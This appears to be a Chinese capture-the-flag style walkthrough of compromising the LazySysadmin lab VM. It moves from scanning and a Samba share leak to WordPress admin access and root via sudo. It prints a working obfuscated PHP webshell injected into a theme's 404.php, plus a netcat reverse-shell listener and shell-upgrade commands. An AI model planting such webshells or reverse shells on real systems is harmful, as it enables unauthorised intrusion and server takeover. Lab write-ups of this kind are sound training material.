靶机链接: https://pan.baidu.com/s/1eLFOW0q8a9L553anRE20hA 提取码: 8820
攻击 IP(Kali) - 192.168.224.139
被攻击 IP(Lazysysadmin,通过主机发现) - 192.168.224.138
目标:拿到服务器 root 权限,并以 root 用户身份登录服务器
主机发现#
netdiscover -r 192.168.224.0/24
或者
nmap -sn 192.168.224.0/24
- 因为攻击机和被攻击机采用 net 模式连接网络,虚拟机网络设置里面可以看到 net 模式分配的 ip 段为
192.168.224.0/24,所以进行主机发现只要扫描该网段就行。
检查该 IP 开放端口,并进行服务识别#
nmap -v -A -T4 192.168.224.138
对扫描结果进行分析#
SSH 服务(22)#
- 可以考虑爆破,如果知道用户名的话,不知道也可以,但是非常浪费时间
WEB 服务(80)#
- 80 端口是 WEB 服务,robots.txt 规则中存在不允许访问的目录
- 访问这几个目录都没有发现有价值的信息
- 使用 dirb 工具进行目录扫描
dirb http://192.168.224.138![]()
- 扫描到以上目录信息
- 先访问一下
info.php,是一个 phpinfo 信息泄露 - 接着访问
wordpress,一直提示博主叫 togie
-
那么刚才 ssh 部分用户名就很有可能是 togie 了,或者其他登录服务的用户名是 togie 了
-
看见署名为 admin,猜测后台账号可能是 admin
-
尝试访问 wordpress 后台路径(刚才扫描出来了)
http://192.168.224.138/wordpress/wp-admin![]()
-
尝试爆破~失败
-
访问
http://192.168.224.138/phpmyadmin/,是数据库管理工具,懒得爆破了![]()
Samba 服务(139,445)#
-
使用 enum4linux 枚举 samba 主机信息
-
发现允许任意用户登录
![]()
-
发现存在共享目录与打印机
![]()
-
远程挂载共享目录
sudo mount -t cifs -o username="",password="" //192.168.224.138/share$ /mnt![]()
-
挂载的是网站目录
-
找到了 wp-config.php 文件
![]()
-
发现数据库账号和密码
![]()
-
尝试直接往里面挂大马,发现没有写入权限,只得从数据库下手了
-
从刚才找到的 phpmyadmin 登录
![]()
-
虽然登录成功,但是没有权限
-
尝试登录用户后台...居然成功了...
-
登录成功后,把这个页面设置成了中文~看着舒服
-
然后尝试写个大马,wp 允许编辑 php 文件来编辑主题,研究了半天觉得还是 404 页面靠谱
![]()
<?php $password='admin';//登录密码 $html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''.'a'.''.'l('.'g'.''."".''.''.'z'.'i'.''.''.'n'.'f'.'l'.''.''."".'a'.'t'.'e(b'.'as'.''.''.''."".''.'e'.'6'.''."".''."".""."".''.'4_'.'d'.'e'.'c'.''.''.''."".''."".'o'.'d'.'e'.'('."'lVZhb5tIEP0eKf9hg6ICEufgXBy1sSI1TTHJKcY5jJsmbYTwspitMUt3SWiT+r/fLLZjjN3UxxfE7sybN29nZtndIZwz7nOSMZ7TdKSZent3RxAhKEt9kQc81+QKjZC2R4Ugubbv961+/7LnfFGyOAsyqtzrOnre3UHw7GN0ilS1Pf96EIQHI5LmcrXLnmiSBAdHDRNpmE2yIKfDhLRRt39poeOG2UY3NA1ZIZDjoVbjUF/i8AQQhoEgx0d+SDALibb6pdwO4n7Xdqzh33fdrvnP460Z2uFhx3M+f6DDT9mhd5G5odn66Ny04k/N8bvz0empouuVCA4p6jGUq6cP10M7iYOmexl8dv7t2XHRtTtjbI9a2O4UgTfg+Ntdcns4Lm69uBXcZPndU/JIbKfo3Tg8nMSTq0JGmgeSQkYPKc6lvuQHFbnQ1EgwPGYZSdWlkiWrhKZjSDwLuCA+UNQkzwVUafH9gfCfYFKaflFB01i9rxrETEj1Rc5zlrCCcG1uKjfU+xWwKAPLFzJa6Wugt6aB9qFOUjZ7A5SBmmbVU2YF3ivkS0T2IIMrtuWhg+cZ2Sm68Lzrg2bD/Mq/pkp7g0cDXC4g9gl6LjlMX7UcQJH9dSar7AT9/xp7FfqcpSkpz+oEnSdMEGm9ySMqOM2J1MAovfU6Ik1jEoSEgxrN+h5maQ7shVSqDlzENCHQexFhUSnxmsaLQiHy7EYE6qlkcWS+O66zeDmqJZtTZG5EXCXWmBUY2YA3/VOIN2+QNucH+YF06NcvVFmQauq/51ARzvxz+NpnhOWhlbqtiS6bZpFgZXOOMF226x4UfMZAVmws5oQus1prYwybPk1prr6yT34QXG9zHAOZF2+tyrVchbHLMpi8ODbQ+cC96l17PrxmdLay9i67Vm/gQd+2trJ3LW/gOp575vQ7lmsgzx1Y29HqW+6ZbTmeUZn+K0MGL3KVSkjnNdz5oS13tjgMEM6H4tfUIIEpJ2elH22aqDmZZLLR3kfQV2vjtIwAFvlPbWap6xvK5j2dZIm8HlTVmCOugVRoKiFJPlJ+loYdiKlshpR0ZAL+oiRXuFUE2JT/HjRSFCSC1MpqNvfl7Z4EeJYt2AMjBZzxyqmsX+rgPHqiaZQEef2yBd8Ks+ns92CLvwPyGCQbLQBs+h8=')));";$css=base64_decode("Q3JlYXRlX0Z1bmN0aW9u");$style=$css('',preg_replace("/#html/","",$html));$style();/*));.'<linkrel="stylesheet"href="$#css"/>';*/ -
理论上访问一个不存在的页面就应该直接 404,但是可能由于我整个 php 重写的大马导致 404 没有成功,
-
不过通过刚才挂载的目录可以找到模板目录的绝对路径
![]()
-
访问模板目录
http://192.168.224.138/wordpress/wp-content/themes/twentyfifteen/404.php -
成功访问大马
![]()
-
登录后使用大马反弹 shell
-
kali 监听
nc -nvlp 1234 -
大马反弹 shell
-
连接成功
![]()
使用
python -c 'import pty; pty.spawn("/bin/bash")'切换 bash 面板(为了好看) -
看了一下用户权限:www-data
![]()
-
并非 root 权限,看一下密码文件所需权限,好吧,root
![]()
-
此路不通,回头再看看共享文件夹,发现了一个密码
- 好像是部署服务器后忘了删除,尝试 ssh 登录,之前不是知道了一个疑似的账号 togie 嘛~
-
登录成功
![]()
-
先看权限,发现这个账户在 sudo 用户组,直接切换到 root 用户
sudo su root![]()
-
修改 root 密码
![]()
-
使用 root 用户登录
![]()
到此渗透完成
总结#
这个靶机设计地不够好,有以下几点:
- togie 用户的密码应该设计地更加复杂,不能被爆破
- togie 用户的密码文件应该放在只有登录 www-data 用户才能读取的文件夹,而不是放在共享文件夹
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论